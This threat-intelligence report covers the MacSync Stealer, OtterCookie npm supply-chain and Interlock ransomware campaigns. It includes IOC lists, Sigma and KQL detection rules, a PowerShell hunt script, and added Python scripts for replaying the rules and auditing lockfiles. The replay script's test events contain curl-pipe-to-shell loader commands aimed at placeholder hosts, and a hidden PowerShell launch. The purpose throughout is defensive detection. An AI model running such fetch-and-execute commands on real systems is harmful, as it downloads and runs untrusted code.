Intelligence Source: AlienVault OTX Live Pulses
Date: 2026-04-14
Author: Security Arsenal Threat Intelligence Unit
Threat Summary
Recent OTX pulses reveal a convergence of high-impact threats targeting distinct sectors: macOS users in SLTT government and the technology supply chain.
- macOS MaaS Campaign: The MacSync Stealer campaign has evolved into a Malware-as-a-Service (MaaS) operation. It is actively targeting State, Local, Tribal, and Territorial (SLTT) government entities using SEO poisoning and "ClickFix" fake CAPTCHA lures. The malware has shifted to shell-based loaders that deliver dynamic AppleScript payloads.
- North Korean Supply Chain Attack: The FAMOUS CHOLLIMA threat actor is using the npm ecosystem to distribute the OtterCookie infostealer. Through a "contagious interview" scam and typosquatting, they clone legitimate libraries (e.g., big.js) to deliver payloads such as BeaverTail and InvisibleFerret, targeting developers in the technology sector.
- Ransomware & Zero-Day Exploitation: The Interlock Ransomware Group is exploiting critical vulnerabilities, most notably a zero-day in Cisco Firepower Management Center (CVE-2026-20131), to deploy custom malware including GHOSTKNIFE and PlasmaLoader.
Collectively, these threats show an aggressive push for initial access via social engineering and supply chain compromise, followed immediately by credential theft and ransomware deployment.
Threat Actor / Malware Profile
MacSync Stealer (Unknown Actor)
- Type: Infostealer / MaaS
- Target: macOS users (Government/SLTT)
- Distribution: SEO Poisoning, Fake ClickFix CAPTCHAs, malicious "ChatGPT" conversations.
- Payload: Shell-based loaders executing dynamic AppleScript.
- Capability: Steals cryptocurrency wallets (Ledger), browser data, and system information.
FAMOUS CHOLLIMA (OtterCookie Campaign)
- Attribution: North Korean APT (Lazarus Group-adjacent cluster).
- Type: Supply Chain Attack / Infostealer
- Target: Software Developers / Technology Sector
- Distribution: Malicious npm packages (obfuscated), dependency confusion.
- Malware: OtterCookie, BeaverTail, InvisibleFerret, Koalemos.
- C2: Vercel-based C2 infrastructure and raw IP communication.
- Persistence: SSH backdoor installation.
Interlock Ransomware Group
- Type: Ransomware-as-a-Service / Exploitation
- Tooling: GHOSTKNIFE, GHOSTSABER, PlasmaLoader, PLASMAGRID.
- Vector: Exploitation of CVE-2026-20131 (Cisco FMC Zero-Day) and other high-risk CVEs.
IOC Analysis
The provided pulses offer a mix of infrastructure and file-based indicators:
- File Hashes (SHA256/MD5): Specific to the MacSync Stealer payloads. Use these to scan endpoints for malware artifacts.
- Domains/Hostnames: Compromised legitimate domains (e.g., houstongaragedoorinstallers.com) used for C2 or distribution in the MacSync campaign. Sinkhole or block these at the proxy/DNS level.
- IPv4 Addresses: A cluster of IPs (e.g., 144.172.110.228) associated with the OtterCookie C2 infrastructure.
- CVEs: Critical identifiers (e.g., CVE-2026-20131) requiring immediate patch-management prioritization.
Operationalizing IOCs:
- EDR: Hunt for file hashes on macOS endpoints.
- Firewall/Proxy: Block the listed domains and IP subnets.
- Vulnerability Management: Immediately scan for the Cisco FMC vulnerability and the other CVEs listed in the Interlock pulse.
Detection Engineering
The following detection logic is tailored to the specific behaviors of MacSync (macOS scripting), OtterCookie (Node.js supply chain), and Interlock (Infrastructure exploitation).
---
title: macOS MacSync Stealer Suspicious AppleScript Execution
description: Detects shell-based loaders executing dynamic AppleScript payloads associated with MacSync Stealer, often triggered via fake browser workflows.
status: experimental
date: 2026/04/14
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66000000000/
tags:
  - attack.execution
  - attack.t1059.002
  - attack.t1059.004
logsource:
  product: macos
  category: process_creation
detection:
  selection:
    ParentImage|endswith:
      - '/Google Chrome'
      - '/Firefox'
      - '/Safari'
    # ClickFix lures have the victim paste the command into Terminal, so in that flow the loader's
    # parent is the interactive shell (Terminal -> login -> zsh), not the browser. Widening
    # ParentImage to '/zsh' and '/bash' catches it but is noisy for developers; if you do, filter
    # command lines whose URLs point only at known-good internal download hosts.
    Image|endswith:
      - '/osascript'
      - '/sh'
      - '/bash'
      - '/zsh'
    CommandLine|contains:
      - 'curl'
      - 'wget'
      - 'http://'
      - 'https://'
  condition: selection
falsepositives:
  - Legitimate administrative automation scripts
  - Browser extensions or helper apps that legitimately launch shell scripts with download steps
level: high
---
title: OtterCookie Node.js Supply Chain Attack
description: Detects Node.js processes spawning shell or PowerShell, a hallmark of the OtterCookie/BeaverTail npm supply chain campaign.
status: experimental
date: 2026/04/14
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66000000001/
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1059.003
  - attack.t1204.002
  - attack.t1195.002
logsource:
  product: windows
  category: process_creation
detection:
  selection_parent:
    ParentImage|endswith:
      - '\node.exe'
      - 'node'   # non-.exe builds; tighten to '\node' if the bare suffix proves too broad
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\bash.exe'
      - '\wsl.exe'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate developer build scripts (low volume); baseline npm lifecycle scripts on CI runners and filter by command line
level: high
---
title: Interlock Ransomware PlasmaLoader C2 Activity
description: Detects potential connections to known C2 infrastructure associated with the Interlock Ransomware Group and OtterCookie campaigns.
status: experimental
date: 2026/04/14
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66000000002/
tags:
  - attack.command_and_control
logsource:
  category: network_connection
detection:
  selection:
    # Substring match on the dotted prefix, i.e. the whole /24 of each IOC range. Swap in the
    # exact IOC addresses if a prefix is too broad for your environment.
    DestinationIp|contains:
      - '144.172.110.'
      - '107.189.22.'
  condition: selection
falsepositives:
  - Other hosts in the same /24 where the prefix is shared hosting; confirm against the exact IOC list before blocking
level: critical
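To see what the three selections above actually match, here is a small replay of their logic over constructed process-creation and network events. This is an added example, not code from the page or from Security Arsenal; the events, hosts and paths are constructed placeholders, and CLICKFIX_PARENTS and the known-good-host suppression are assumed extensions of the first rule rather than part of it. It also shows why the third rule's `contains` on a dotted prefix is really a /24 match, by parsing the address instead.

```python
"""Replay the three Sigma selections above over constructed events.

Added example; not code from the page or from Security Arsenal. The events below
are constructed, not real telemetry, and the hosts in them are placeholders.
CLICKFIX_PARENTS and known_good_hosts are assumed extensions of rule 1.
"""
from __future__ import annotations

import ipaddress
import re
from typing import Iterable

URL_HOST = re.compile(r"https?://([^/\s\"')]+)", re.I)


def _endswith(value: str, suffixes: Iterable[str]) -> bool:
    """Sigma string matching is case-insensitive by default; emulate that."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains(value: str, needles: Iterable[str]) -> bool:
    v = value.lower()
    return any(n.lower() in v for n in needles)


MACSYNC_PARENTS = ("/Google Chrome", "/Firefox", "/Safari")
# A ClickFix paste runs under the victim's interactive shell (Terminal -> login -> zsh),
# so the loader's parent is zsh/bash, not the browser. Widening to these is noisy.
CLICKFIX_PARENTS = MACSYNC_PARENTS + ("/zsh", "/bash")


def macsync_loader(ev: dict, parents: Iterable[str] = MACSYNC_PARENTS,
                   known_good_hosts: frozenset = frozenset()) -> bool:
    """Rule 1: parent -> sh/bash/zsh/osascript with a downloader or URL on the command line.
    A command line whose URLs all point at known-good hosts is suppressed (tuning knob)."""
    cmd = ev.get("CommandLine", "")
    hit = (_endswith(ev.get("ParentImage", ""), parents)
           and _endswith(ev.get("Image", ""), ("/osascript", "/sh", "/bash", "/zsh"))
           and _contains(cmd, ("curl", "wget", "http://", "https://")))
    hosts = {h.lower() for h in URL_HOST.findall(cmd)}
    if hit and hosts and hosts <= known_good_hosts:
        return False
    return hit


def ottercookie_node_shell(ev: dict) -> bool:
    """Rule 2: node(.exe) spawning a Windows shell."""
    return (_endswith(ev.get("ParentImage", ""), ("\\node.exe", "node"))
            and _endswith(ev.get("Image", ""),
                          ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe", "\\bash.exe", "\\wsl.exe")))


# Rule 3's DestinationIp|contains '144.172.110.' is a /24 prefix written as a substring test.
# Parsing the address makes that intent explicit and rejects anything that is not an IP.
C2_NETS = tuple(ipaddress.ip_network(n) for n in ("144.172.110.0/24", "107.189.22.0/24"))


def interlock_c2(ev: dict) -> bool:
    try:
        ip = ipaddress.ip_address(ev.get("DestinationIp", ""))
    except ValueError:
        return False
    return any(ip in net for net in C2_NETS)


# Constructed process-creation events (not real telemetry).
PROCESS_EVENTS = [
    {"ParentImage": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
     "Image": "/bin/sh",
     "CommandLine": 'sh -c "curl -fsSL https://cdn.example.invalid/loader.sh | sh"'},
    {"ParentImage": "/bin/zsh",                      # ClickFix: pasted into Terminal's zsh
     "Image": "/bin/sh",
     "CommandLine": 'sh -c "$(curl -fsSL https://captcha.example.invalid/verify)"'},
    {"ParentImage": "/Applications/Safari.app/Contents/MacOS/Safari",
     "Image": "/usr/bin/osascript",
     "CommandLine": "osascript -e 'display dialog \"hello\"'"},   # no download: benign
    {"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c whoami"},
    {"ParentImage": "/bin/zsh",                      # developer bootstrap from an internal host
     "Image": "/bin/sh",
     "CommandLine": 'sh -c "curl -fsSL https://pkgs.corp.example/bootstrap.sh | sh"'},
]

# Constructed network events.
NETWORK_EVENTS = [
    {"DestinationIp": "144.172.110.228"},
    {"DestinationIp": "144.172.11.228"},   # a different /24, must not match
    {"DestinationIp": "107.189.22.20"},
    {"DestinationIp": "not-an-ip"},
]


def run_all() -> dict:
    tuned = frozenset({"pkgs.corp.example"})   # assumed internal download host
    return {
        "macsync_as_written": [macsync_loader(e) for e in PROCESS_EVENTS],
        "macsync_widened": [macsync_loader(e, CLICKFIX_PARENTS) for e in PROCESS_EVENTS],
        "macsync_widened_tuned": [macsync_loader(e, CLICKFIX_PARENTS, tuned) for e in PROCESS_EVENTS],
        "ottercookie": [ottercookie_node_shell(e) for e in PROCESS_EVENTS],
        "interlock_c2": [interlock_c2(e) for e in NETWORK_EVENTS],
    }


if __name__ == "__main__":
    for name, hits in run_all().items():
        print(f"{name}: {hits}")
```

The replay makes the tuning trade-off concrete: the rule as written catches the browser-spawned loader but misses the ClickFix paste (second event); widening the parent list catches it but also fires on the developer bootstrap (fifth event), which the known-good-host filter then suppresses. Case-insensitive matching matters on macOS because the Firefox binary is `firefox`, not `Firefox`.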
KQL Hunt (Microsoft Sentinel)
// Hunt for OtterCookie/Interlock C2 IPs and MacSync hashes (Defender Advanced Hunting tables in Sentinel).
// Keep the hashes lowercase: the SHA256/MD5 columns are lowercase and `in` is case-sensitive.
let C2IPs = dynamic(["144.172.110.228", "144.172.110.96", "144.172.110.132", "107.189.22.20"]);
let MacSyncMD5 = dynamic(["5190ef1733183a0dc63fb623357f56d6"]);
let MacSyncSHA256 = dynamic(["866993e9950250ac2ce8c3b4c6a8bd39285e0fafd93860f235a3b0370f160dd1"]);
// Network connections to C2 infrastructure
let c2 = DeviceNetworkEvents
| where RemoteIP in (C2IPs)
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort, RemoteUrl
| extend Alert = "C2 Connection to OtterCookie/Interlock IP";
// File artifacts for MacSync
let files = DeviceFileEvents
| where SHA256 in (MacSyncSHA256) or MD5 in (MacSyncMD5)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, MD5
| extend Alert = "MacSync Stealer File Detected";
// A KQL query returns a single tabular expression, so combine the two hunts with union
union c2, files
| order by Timestamp desc
PowerShell Hunt Script
# IOC Hunter for MacSync Hashes and OtterCookie C2 IPs
# Requires Admin privileges for accurate network enumeration (owning PIDs of other users' connections)
$MacSyncHashes = @(
    "866993e9950250ac2ce8c3b4c6a8bd39285e0fafd93860f235a3b0370f160dd1",
    "b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0",
    "c56a1b268f358d9fb4d6264932706b53a7347e2544bb5f26355b0c7fc1d299d8"
)
$OtterCookieIPs = @(
    "144.172.110.228", "144.172.110.96", "144.172.110.132", "144.172.116.22",
    "144.172.93.169", "144.172.93.253", "144.172.99.248", "107.189.22.20"
)
# Hashing every file under the system drive is slow; narrow this to download folders or file shares where
# a macOS payload could have been staged (MacSync is a macOS binary, so it does not execute on Windows).
$SearchRoot = "C:\"

Write-Host "[+] Scanning for MacSync Stealer File Hashes..." -ForegroundColor Cyan
# FileInfo objects carry no Hash property; compute SHA256 with Get-FileHash. -contains is case-insensitive.
Get-ChildItem -Path $SearchRoot -File -Recurse -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0 } |
    Get-FileHash -Algorithm SHA256 -ErrorAction SilentlyContinue |
    Where-Object { $MacSyncHashes -contains $_.Hash } |
    Select-Object Path, Hash |
    Format-Table -AutoSize

Write-Host "[+] Checking Active Network Connections for OtterCookie C2 IPs..." -ForegroundColor Cyan
# Get-NetTCPConnection returns a parsed RemoteAddress and OwningProcess, so no netstat text parsing is needed
# (and $PID is a read-only automatic variable, so it cannot be reused as a loop variable).
Get-NetTCPConnection -ErrorAction SilentlyContinue |
    Where-Object { $OtterCookieIPs -contains $_.RemoteAddress } |
    ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        Write-Host ("[!] Suspicious Connection: {0}:{1} (State: {2}, PID: {3} - Process: {4})" -f $_.RemoteAddress, $_.RemotePort, $_.State, $_.OwningProcess, $proc.ProcessName) -ForegroundColor Red
    }
Response Priorities
Immediate (0-24h):
- Block all IOCs (domains and IP ranges) at the network perimeter.
- Scan macOS endpoints for the identified MacSync Stealer file hashes.
- Identify and block the malicious npm packages associated with the OtterCookie campaign in internal artifact repositories.
24h - 48h:
- Credential Reset: If MacSync or OtterCookie execution is suspected, treat the affected users' cryptocurrency wallet seeds, SSH keys, and browser-saved credentials as compromised: move funds to freshly generated wallets, rotate SSH keys, and reset the saved passwords.
- Hunt: Run the provided PowerShell/KQL queries to identify lateral movement or persistence, including the SSH backdoor OtterCookie installs.
1 Week:
- Patch Management: Prioritize patching for CVE-2026-20131 (Cisco FMC) and the 31 high-impact vulnerabilities listed in the March 2026 CVE landscape.
- Supply Chain Hardening: Implement strict package verification and allow-listing for npm/internal package registries.
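Package verification and allow-listing can be enforced mechanically against the lockfile before `npm ci` runs. The script below is an added example, not tooling from the page or from Security Arsenal: the allow-list, the internal registry host and the package-lock.json are all constructed for the demonstration. It flags the three conditions the OtterCookie/BeaverTail campaign relies on: a dependency that is not allow-listed but closely resembles an allowed name (a clone of big.js), a dependency that runs install-time scripts, and an internal package name that resolved from the public registry (dependency confusion).

```python
"""Audit a package-lock.json (lockfileVersion 3) against an allow-list.

Added example, not tooling from the page or from Security Arsenal. ALLOWED,
INTERNAL_NAMES, INTERNAL_REGISTRY and SAMPLE_LOCK are constructed for the demo.
"""
from __future__ import annotations

import difflib
import json
from urllib.parse import urlparse

# Hypothetical policy inputs.
ALLOWED = {"big.js", "express", "lodash", "internal-utils"}
INTERNAL_NAMES = {"internal-utils"}        # must only ever resolve from INTERNAL_REGISTRY
INTERNAL_REGISTRY = "npm.corp.example"     # placeholder host
LOOKALIKE_CUTOFF = 0.8                     # difflib similarity ratio treated as "looks like"


def package_name(lock_path: str) -> str:
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (the last node_modules segment)."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def audit_lock(lock: dict) -> list:
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if path == "":                      # the root project entry, not a dependency
            continue
        name = package_name(path)
        host = urlparse(meta.get("resolved", "")).hostname or ""
        if name not in ALLOWED:
            # Typosquat check: an unknown name within edit distance of an allowed one.
            near = difflib.get_close_matches(name, sorted(ALLOWED), n=1, cutoff=LOOKALIKE_CUTOFF)
            findings.append({"package": name, "issue": "not-allow-listed",
                             "lookalike": near[0] if near else None})
        if meta.get("hasInstallScript"):
            # npm records this when the package declares preinstall/install/postinstall.
            findings.append({"package": name, "issue": "install-script"})
        if name in INTERNAL_NAMES and host != INTERNAL_REGISTRY:
            findings.append({"package": name, "issue": "dependency-confusion", "resolved_from": host})
        if not meta.get("integrity"):
            findings.append({"package": name, "issue": "missing-integrity"})
    return findings


# Constructed lockfile: 'bigjs' stands in for a typosquatted clone of big.js.
SAMPLE_LOCK = json.loads("""
{
  "name": "demo-app", "lockfileVersion": 3, "requires": true,
  "packages": {
    "": {"name": "demo-app",
         "dependencies": {"bigjs": "^1.0.0", "express": "^4.19.2", "internal-utils": "^2.0.0"}},
    "node_modules/bigjs": {"version": "1.0.0",
         "resolved": "https://registry.npmjs.org/bigjs/-/bigjs-1.0.0.tgz",
         "integrity": "sha512-constructed", "hasInstallScript": true},
    "node_modules/express": {"version": "4.19.2",
         "resolved": "https://registry.npmjs.org/express/-/express-4.19.2.tgz",
         "integrity": "sha512-constructed"},
    "node_modules/internal-utils": {"version": "2.0.0",
         "resolved": "https://registry.npmjs.org/internal-utils/-/internal-utils-2.0.0.tgz",
         "integrity": "sha512-constructed"}
  }
}
""")


if __name__ == "__main__":
    for finding in audit_lock(SAMPLE_LOCK):
        print(finding)
```

Run it as a CI gate that fails the build on any finding. The install-script check is the one that matters most against this campaign: even a package that survives the name checks cannot run code at install time if the pipeline also uses `npm ci --ignore-scripts`, and the `hasInstallScript` flag in the lockfile tells you which packages would have.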